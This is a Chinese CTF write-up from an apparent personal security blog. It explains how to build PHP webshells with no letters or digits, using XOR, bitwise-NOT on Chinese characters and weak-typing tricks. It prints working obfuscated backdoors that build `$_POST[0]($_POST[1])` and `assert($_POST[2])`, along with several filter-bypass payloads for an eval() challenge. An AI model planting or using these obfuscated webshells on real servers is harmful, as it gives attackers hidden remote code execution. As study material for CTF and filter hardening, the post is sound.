<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="花式构造没有数字字母的webshell"><meta name="keywords" content="php,webshell"><meta name="author" content="V0WKeep3r,v0wldl@163.com"><meta name="copyright" content="V0WKeep3r"><title>花式构造没有数字字母的webshell | V0W's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="V0W's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%8A%B1%E5%BC%8F%E6%9E%84%E9%80%A0%E6%B2%A1%E6%9C%89%E6%95%B0%E5%AD%97%E5%AD%97%E6%AF%8D%E7%9A%84webshell"><span class="toc-text">花式构造没有数字字母的webshell</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%97%AE%E9%A2%98%E5%BC%95%E5%85%A5"><span class="toc-text">问题引入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="toc-text">php基础知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%82%E6%88%96%E8%BF%90%E7%AE%97"><span class="toc-text">异或运算^</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%96%E5%8F%8D%E8%BF%90%E7%AE%97"><span class="toc-text">取反运算~</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%92%E5%A2%9E%E8%BF%90%E7%AE%97"><span class="toc-text">递增运算</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%B1%E7%B1%BB%E5%9E%8B-%E4%B8%8D%E7%94%A8%E6%95%B0%E5%AD%97%E6%9E%84%E9%80%A0%E6%95%B0%E5%AD%97"><span class="toc-text">弱类型-不用数字构造数字</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84%E4%BE%8B%E5%AD%90"><span class="toc-text">一个简单的例子</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9E%E5%88%B0%E9%97%AE%E9%A2%98"><span class="toc-text">回到问题</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-text">参考链接</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/Kaneki.jpg"></div><div class="author-info__name text-center">V0WKeep3r</div><div class="author-info__description text-center">Stay Hungry, Stay Foolish.</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/qingchenldl">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">58</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">31</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">11</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://zhuxianjin.github.io/">J0k3r</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://daolgts.github.io/">dlgts</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://iwenhu.cn/">mengchen</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0sec.net/">p0</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://asa9ao.xyz/">唯湖</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.nicefish.top/posts/">nicefish</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://flag0.com/">GetFlag</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/index.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">V0W's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/about">关于我</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">花式构造没有数字字母的webshell</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-08-14</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.5k</span><span class="post-meta__separator">|</span><span>阅读时长: 6 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="花式构造没有数字字母的webshell"><a href="#花式构造没有数字字母的webshell" class="headerlink" title="花式构造没有数字字母的webshell"></a>花式构造没有数字字母的webshell</h1><h2 id="问题引入"><a href="#问题引入" class="headerlink" title="问题引入"></a>问题引入</h2><p>之前遇到一个题，如下：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &#39;flag.php&#39;;</span><br><span class="line">if(isset($_GET[&#39;code&#39;]))&#123;</span><br><span class="line">    $code &#x3D; $_GET[&#39;code&#39;];</span><br><span class="line">    if(strlen($code)&gt;40)&#123;</span><br><span class="line">        die(&quot;Long.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    if(preg_match(&quot;&#x2F;[A-Za-z0-9]+&#x2F;&quot;,$code))&#123;</span><br><span class="line">        die(&quot;NO.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    @eval($code);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">&#x2F;&#x2F;$hint &#x3D;  &quot;php function getFlag() to get flag&quot;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br><span class="line">另附上我写的flag.php,作为完整测试</span><br><span class="line">&#x2F;&#x2F;flag.php</span><br><span class="line">&lt;?php</span><br><span class="line">function getFlag()&#123;</span><br><span class="line">	$flag &#x3D; &quot;flag&#123;you_get_me&#125;&quot;;</span><br><span class="line">	echo $flag;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>虽然之前遇到类似的，但是把长度限制了，一时还是有点懵住，特记录分享。</p>
<h2 id="php基础知识"><a href="#php基础知识" class="headerlink" title="php基础知识"></a>php基础知识</h2><p>想花式构造webshell，需要先了解一下php中的一些语法知识。</p>
<h3 id="异或运算"><a href="#异或运算" class="headerlink" title="异或运算^"></a>异或运算^</h3><p>在php中的字符串变量异或，会先将字符串转换成 ASCII 值，再将 ASCII 值转换成二进制再进行异或，异或完又将结果从二进制转换成ASCII值，再转换成字符串。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php &gt; echo &#39;#&#39;^&#39;|&#39;;</span><br><span class="line">_</span><br><span class="line">&gt;&gt;&gt; bin(ord(&#39;|&#39;)).replace(&#39;0b&#39;,&#39;&#39;)</span><br><span class="line">&#39;1111100&#39;</span><br><span class="line">&gt;&gt;&gt; bin(ord(&#39;#&#39;)).replace(&#39;0b&#39;,&#39;&#39;)</span><br><span class="line">&#39;100011&#39;</span><br><span class="line">&gt;&gt;&gt; bin(ord(&#39;_&#39;)).replace(&#39;0b&#39;,&#39;&#39;)</span><br><span class="line">&#39;1011111&#39;</span><br><span class="line"></span><br><span class="line">&gt;&gt;&gt; chr(int(0b1011111))</span><br><span class="line">&#39;_&#39;</span><br><span class="line"></span><br><span class="line">&#39;#&#39;		二进制：00100011</span><br><span class="line">&#39;|&#39;		二进制: 01111100</span><br><span class="line">异或之后得到：   01011111</span><br><span class="line">即&#39;_&#39;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="取反运算"><a href="#取反运算" class="headerlink" title="取反运算~"></a>取反运算~</h3><p>一般利用汉字，因为汉字的uniocode占3字节。可以利用其构造字母。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php &gt; echo ~&#39;生&#39;;</span><br><span class="line">k&#96;</span><br><span class="line">php &gt; echo ~&#39;生&#39;[1];</span><br><span class="line">k</span><br><span class="line">php &gt; echo ~&#39;生&#39;[2];</span><br><span class="line">&#96;</span><br></pre></td></tr></table></figure>
<h3 id="递增运算"><a href="#递增运算" class="headerlink" title="递增运算"></a>递增运算</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php &gt; echo $_;</span><br><span class="line">a</span><br><span class="line">php &gt; echo ++$_;</span><br><span class="line">b</span><br><span class="line">php &gt; echo $_;</span><br><span class="line">b</span><br><span class="line">php &gt; echo --$_;</span><br><span class="line">b</span><br><span class="line">php &gt; $_ &#x3D; &#39;z&#39;;</span><br><span class="line">php &gt; echo ++$_;</span><br><span class="line">aa</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="弱类型-不用数字构造数字"><a href="#弱类型-不用数字构造数字" class="headerlink" title="弱类型-不用数字构造数字"></a>弱类型-不用数字构造数字</h3><p>php 中未定义的变量默认值为 null，由php弱类型<code>null==false==0</code></p>
<p>所以能通过对未定义变量的自增操作来得到一个数字。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php &gt; $_++;echo $_;</span><br><span class="line">PHP Notice:  Undefined variable: _ in php shell code on line 1</span><br><span class="line">1</span><br><span class="line">&#x2F;&#x2F;加个@不会报错</span><br><span class="line">php &gt; @$_++;echo $_;</span><br><span class="line">1</span><br></pre></td></tr></table></figure>
<p>null==null==1,只能是一不能增减</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php &gt; $_&#x3D;_&#x3D;&#x3D;_;echo $_;</span><br><span class="line">PHP Notice:  Use of undefined constant _ - assumed &#39;_&#39; in php shell code on line 1</span><br><span class="line">PHP Notice:  Use of undefined constant _ - assumed &#39;_&#39; in php shell code on line 1</span><br><span class="line">1</span><br><span class="line">&#x2F;&#x2F;加个@不会报错</span><br><span class="line">php &gt; @$_&#x3D;_&#x3D;&#x3D;_;echo $_;</span><br><span class="line">1</span><br><span class="line">php &gt; echo $_++;</span><br></pre></td></tr></table></figure>
<p>有了数字1也就能构造其他数字</p>
<h2 id="一个简单的例子"><a href="#一个简单的例子" class="headerlink" title="一个简单的例子"></a>一个简单的例子</h2><p>之前遇到类似的，构造没有数字字母的webshell的题目。<br>一个简单的例子，如下：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(!preg_match(&#39;&#x2F;[a-z0-9]&#x2F;is&#39;,$_GET[&#39;shell&#39;])) &#123;</span><br><span class="line"> eval($_GET[&#39;shell&#39;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以利用一些操作，如<code>异或^</code></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    @$_++; &#x2F;&#x2F; $_ &#x3D; 1</span><br><span class="line">    $__&#x3D;(&quot;#&quot;^&quot;|&quot;); &#x2F;&#x2F; $__ &#x3D; _</span><br><span class="line">    $__.&#x3D;(&quot;.&quot;^&quot;~&quot;); &#x2F;&#x2F; _P</span><br><span class="line">    $__.&#x3D;(&quot;&#x2F;&quot;^&quot;&#96;&quot;); &#x2F;&#x2F; _PO</span><br><span class="line">    $__.&#x3D;(&quot;|&quot;^&quot;&#x2F;&quot;); &#x2F;&#x2F; _POS</span><br><span class="line">    $__.&#x3D;(&quot;&#123;&quot;^&quot;&#x2F;&quot;); &#x2F;&#x2F; _POST </span><br><span class="line">    $&#123;$__&#125;[!$_]($&#123;$__&#125;[$_]); &#x2F;&#x2F; $_POST[0]($_POST[1]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>中文取反</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$__&#x3D;(&#39;&gt;&#39;&gt;&#39;&lt;&#39;)+(&#39;&gt;&#39;&gt;&#39;&lt;&#39;);&#x2F;&#x2F;$__2</span><br><span class="line">$_&#x3D;$__&#x2F;$__;&#x2F;&#x2F;$_1</span><br><span class="line"></span><br><span class="line">$____&#x3D;&#39;&#39;;</span><br><span class="line">$___&#x3D;&quot;瞰&quot;;$____.&#x3D;~($___&#123;$_&#125;);$___&#x3D;&quot;和&quot;;$____.&#x3D;~($___&#123;$__&#125;);$___&#x3D;&quot;和&quot;;$____.&#x3D;~($___&#123;$__&#125;);$___&#x3D;&quot;的&quot;;$____.&#x3D;~($___&#123;$_&#125;);$___&#x3D;&quot;半&quot;;$____.&#x3D;~($___&#123;$_&#125;);$___&#x3D;&quot;始&quot;;$____.&#x3D;~($___&#123;$__&#125;);&#x2F;&#x2F;$____&#x3D;assert</span><br><span class="line"></span><br><span class="line">$_____&#x3D;&#39;_&#39;;$___&#x3D;&quot;俯&quot;;$_____.&#x3D;~($___&#123;$__&#125;);$___&#x3D;&quot;瞰&quot;;$_____.&#x3D;~($___&#123;$__&#125;);$___&#x3D;&quot;次&quot;;$_____.&#x3D;~($___&#123;$_&#125;);$___&#x3D;&quot;站&quot;;$_____.&#x3D;~($___&#123;$_&#125;);&#x2F;&#x2F;$_____&#x3D;_POST</span><br><span class="line"></span><br><span class="line">$_&#x3D;$$_____;&#x2F;&#x2F;$_&#x3D;$_POST</span><br><span class="line">$____($_[$__]);&#x2F;&#x2F;assert($_POST[2])</span><br></pre></td></tr></table></figure>

<h2 id="回到问题"><a href="#回到问题" class="headerlink" title="回到问题"></a>回到问题</h2><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &#39;flag.php&#39;;</span><br><span class="line">if(isset($_GET[&#39;code&#39;]))&#123;</span><br><span class="line">    $code &#x3D; $_GET[&#39;code&#39;];</span><br><span class="line">    if(strlen($code)&gt;40)&#123;</span><br><span class="line">        die(&quot;Long.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    if(preg_match(&quot;&#x2F;[A-Za-z0-9]+&#x2F;&quot;,$code))&#123;</span><br><span class="line">        die(&quot;NO.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    @eval($code);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">&#x2F;&#x2F;$hint &#x3D;  &quot;php function getFlag() to get flag&quot;;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>题目要求构造的函数为<code>getFlag</code>,但是加了一个限制条件，<code>length &lt; 40</code></p>
<p><strong>方法1(符号异或^)</strong><br>虽然有了长度限制，但是基本思路不变，写个脚本来爆出想要的结果<code>_GET</code>或者<code>_POST</code><br><strong>payload1</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php &gt; echo &quot;&#96;&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;&#x2F;&quot;;</span><br><span class="line">_GET</span><br><span class="line"></span><br><span class="line">?code&#x3D;$_&#x3D;&quot;&#96;&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;&#x2F;&quot;;$&#123;$_&#125;[_]();&amp;_&#x3D;getFlag</span><br><span class="line"></span><br><span class="line">$_ &#x3D; _GET</span><br><span class="line">$&#123;$_&#125;[_]()   &#x2F;&#x2F;$_GET[_]()</span><br></pre></td></tr></table></figure>
<p>这里很巧妙的利用php的可变变量。<br>还有一点很巧妙，检测变量<code>code</code>，但是没有对其他的变量检测，其他变量可以用字母数字。</p>
<p>若禁用下划线<code>_</code>还可以用以下代替<code>_</code></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$&#123;&quot;&#96;&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;&#x2F;&quot;&#125;[(&quot;#&quot;^&quot;|&quot;)]();&amp;_&#x3D;getFlag</span><br></pre></td></tr></table></figure>

<p><strong>方法二(直接构造函数getFlag)</strong><br><strong>payload2</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">?code&#x3D;$_&#x3D;(&#39;][%2B:@_:&#39;^&#39;:&gt;_|,&gt;]&#39;);$_();</span><br></pre></td></tr></table></figure>
<p>直接用这个函数，不用传参进去，但是缺点是没有真正拿到shell，而且构造有点难。</p>
<p><strong>方法3(利用一些不可见字符的url编码取反)</strong><br>这种方法类似中文的那种取反操作。<br>有个<strong>payload3</strong>是这样子：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">?code&#x3D;$_&#x3D;~%98%9A%8B%B9%93%9E%98;$_();</span><br></pre></td></tr></table></figure>
<p>这个是把getFlag取反然后URL编码</p>
<p>另一个<strong>payload4</strong>是这样的：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">?code&#x3D;$&#123;~&quot;%A0%B8%BA%AB&quot;&#125;[%aa]();&amp;%aa&#x3D;getFlag</span><br></pre></td></tr></table></figure>
<p>~ 在 {} 中执行了取反操作，所以 <code>$&#123;~&quot;\xa0\xb8\xba\xab&quot;&#125;</code>取反相当于 $_GET，拼接出了 <code>$_GET[&#39;\xaa&#39;]();</code>，传入 <code>\xaa=getFlag()</code> 从而执行了函数</p>
<p><strong>payload5</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">code&#x3D;$啊&#x3D;(&#39;]@\&#96;@@]&#39;^&#39;:%(&amp;,!:&#39;);$啊();</span><br></pre></td></tr></table></figure>
<p>$啊=getFlag;$啊();，这里就不需要用 {} 了，因为取反的值直接被当作字符串赋值给了 $ 啊。</p>
<hr>
<p>其实在掌握基本方法之后，payload有很多，原理其实基本相同，只是在构造的时候，仁者见仁。</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a target="_blank" rel="noopener" href="http://www.cnblogs.com/ECJTUACM-873284962/p/9433641.html">记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html">离别歌-webshell without alphanum</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:v0wldl@163.com">V0WKeep3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://v0w.top/2018/08/14/花式构造没有数字字母的webshell/">http://v0w.top/2018/08/14/花式构造没有数字字母的webshell/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://v0w.top">V0W's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/php/">php</a><a class="post-meta__tags" href="/tags/webshell/">webshell</a></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/AlipayQR.png"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/wechatQR.png"><div class="post-qr-code__desc">微信打赏</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/08/14/TJCTF%20WP/"><i class="fa fa-chevron-left">  </i><span>TJCTF2018 WP</span></a></div><div class="next-post pull-right"><a href="/2018/08/13/%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E5%AF%BC%E8%87%B4%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/"><span> 目录穿越导致任意文件读取</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'xuqLRcah5FaInOgKRdj9JB3V-gzGzoHsz',
  appKey:'8vMPXnFoh7Fih1g29jw4JNxl',
  placeholder:'师傅可以留下你的评论和邮箱，V0W能够通过邮件get并回复哦～',
  avatar:'retro',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/index.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2020 By V0WKeep3r</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>